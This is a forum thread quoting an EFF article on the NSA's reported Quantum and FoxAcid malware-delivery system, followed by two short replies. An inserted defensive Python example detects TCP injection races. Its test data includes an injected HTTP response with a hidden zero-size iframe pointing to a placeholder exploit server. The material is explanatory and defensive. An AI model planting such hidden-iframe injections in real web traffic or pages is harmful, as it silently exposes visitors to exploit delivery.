How The NSA Deploys Malware: An In-Depth Look at the New Revelations
https://www.eff.org/deeplinks/2013/10/how-nsa-deploys-malware-new-revelations
October 8, 2013 | By Dan Auerbach
We've long suspected that the NSA, the world's premier spy agency, was pretty good at breaking into computers. But now, thanks to an article by security expert Bruce Schneier (who is working with the Guardian to go through the Snowden documents), we have a much more detailed view of how the NSA uses exploits in order to infect the computers of targeted users. The template for attacking people with malware used by the NSA is in widespread use by criminals and fraudsters, as well as foreign intelligence agencies, so it's important to understand and defend against this threat to avoid being a victim of the plethora of attackers out there.
Deploying malware over the web generally involves two steps. First, as an attacker, you have to get your victim to visit a website under your control. Second, you have to get software, known as malware, installed on the victim's computer in order to gain control of that machine. This formula isn't universal, but it is often how web-based malware attacks proceed.
In order to accomplish the first step of getting a user to visit a site under your control, an attacker might email the victim text that contains a link to the website in question, in a so-called phishing attack. The NSA reportedly uses phishing attacks sometimes, but we've learned that this step usually proceeds via a so-called man-in-the-middle attack.[1] The NSA controls a set of servers codenamed Quantum that sit on the Internet backbone, and these servers are used to redirect targets away from their intended destinations to still other NSA-controlled servers that are responsible for the injection of malware. So, for example, if a targeted user visits yahoo.com, the target's browser will display the ordinary Yahoo! landing page but will actually be communicating with a server controlled by the NSA. This malicious version of Yahoo!'s website will tell the victim's browser to make a request in the background to another server controlled by the NSA which is used to deploy malware...
...The NSA has a set of servers on the public Internet with the code name FoxAcid used to deploy malware. Once their Quantum servers redirect targets to a specially crafted URL hosted on a FoxAcid server, software on that FoxAcid server selects from a toolkit of exploits in order to gain access to the user's computer. Presumably this toolkit has both known public exploits that rely on a user's software being out of date, as well as zero-day exploits, which are generally saved for high-value targets.[2] The agency then reportedly uses this initial malware to install longer-lasting malware.
Also discussed here:
http://www.theguardian.com/world/2013/oct/04/tor-attacks-nsa-users-online-anonymity
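The two stages the article describes (an on-path redirect, then a background request to a separate exploit server) leave traces a defender can look for. The following is an added example, not code from the EFF article, the Guardian reporting, or this thread. It assumes that the Quantum redirect works as the reporting describes packet injection: a spoofed server reply that races the genuine one, so the client sees two TCP segments claiming the same sequence number but carrying different bytes. It then checks which hosts the winning segment would make the browser contact in the background. All addresses, hostnames and HTTP bodies are constructed placeholders (RFC 5737/2606 documentation ranges), not a real capture.

```python
"""Spot an injection race in server->client TCP segments, then list the
background hosts the injected reply pulls in. Added example; constructed data."""
import re
from urllib.parse import urlparse

# Constructed sample flow: client fetches http://www.example.net/ and sees
# two replies with the same sequence number. The spoofed one arrives first.
CLIENT = ("10.0.0.5", 51000)
SERVER = ("203.0.113.10", 80)

LEGIT_BODY = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><body><h1>Welcome</h1>"
    "<img src=\"http://static.example.net/logo.png\"></body></html>"
)
# Same visible page, plus an invisible frame to a placeholder exploit host.
INJECTED_BODY = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><body><h1>Welcome</h1>"
    "<iframe src=\"http://exploit-server.example/landing?id=42\" "
    "width=0 height=0></iframe></body></html>"
)

PACKETS = [
    {"src": CLIENT, "dst": SERVER, "seq": 7000,
     "payload": "GET / HTTP/1.1\r\nHost: www.example.net\r\n\r\n"},
    {"src": SERVER, "dst": CLIENT, "seq": 1000, "payload": INJECTED_BODY},  # spoofed, wins
    {"src": SERVER, "dst": CLIENT, "seq": 1000, "payload": LEGIT_BODY},     # genuine, late
]


def find_injection_races(packets, server, client):
    """Return (seq, first_payload, later_payload) for server->client segments
    that reuse a sequence number with different bytes. A plain retransmission
    carries identical bytes and is not flagged."""
    first_seen = {}
    races = []
    for p in packets:
        if p["src"] != server or p["dst"] != client:
            continue
        seq = p["seq"]
        if seq not in first_seen:
            first_seen[seq] = p["payload"]
        elif first_seen[seq] != p["payload"]:
            races.append((seq, first_seen[seq], p["payload"]))
    return races


_SRC_RE = re.compile(r'(?:src|href)\s*=\s*["\']([^"\']+)["\']', re.I)


def third_party_hosts(http_response, expected_domain):
    """Hosts a browser would contact while rendering the body, excluding the
    domain the user asked for and its subdomains."""
    body = http_response.split("\r\n\r\n", 1)[-1]
    hosts = set()
    for url in _SRC_RE.findall(body):
        host = urlparse(url).hostname
        if host and host != expected_domain and not host.endswith("." + expected_domain):
            hosts.add(host)
    return sorted(hosts)


def suspicious_background_loads(packets, server, client, expected_domain):
    """Hosts referenced only by the reply that won an injection race."""
    flagged = set()
    for _, winner, loser in find_injection_races(packets, server, client):
        flagged.update(set(third_party_hosts(winner, expected_domain))
                       - set(third_party_hosts(loser, expected_domain)))
    return sorted(flagged)


if __name__ == "__main__":
    for seq, _, _ in find_injection_races(PACKETS, SERVER, CLIENT):
        print("injection race at seq", seq)
    print("background hosts:", suspicious_background_loads(PACKETS, SERVER, CLIENT, "example.net"))
```

On real traffic the same comparison has to be done per flow after reassembly, and a legitimate retransmission must not be flagged (the code only reports differing payloads for that reason). The second check only works on plaintext HTTP, which is exactly why the Guardian piece's remedy of using HTTPS everywhere removes the injection point.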
Original post by friendly_iconoclast, Oct 2013
dkf:
1. Do any virus protectors or security programs wipe them out, or even detect them?
Are the virus programs complicit in leaving this stuff on our computers?
woolldog:
2. Didn't Kaspersky discover the Stuxnet virus?
I believe Iran called them in as consultants.
But I doubt any of the over-the-counter antivirus programs can detect NSA-level viruses. And when/if they do, I suspect the damage has been done.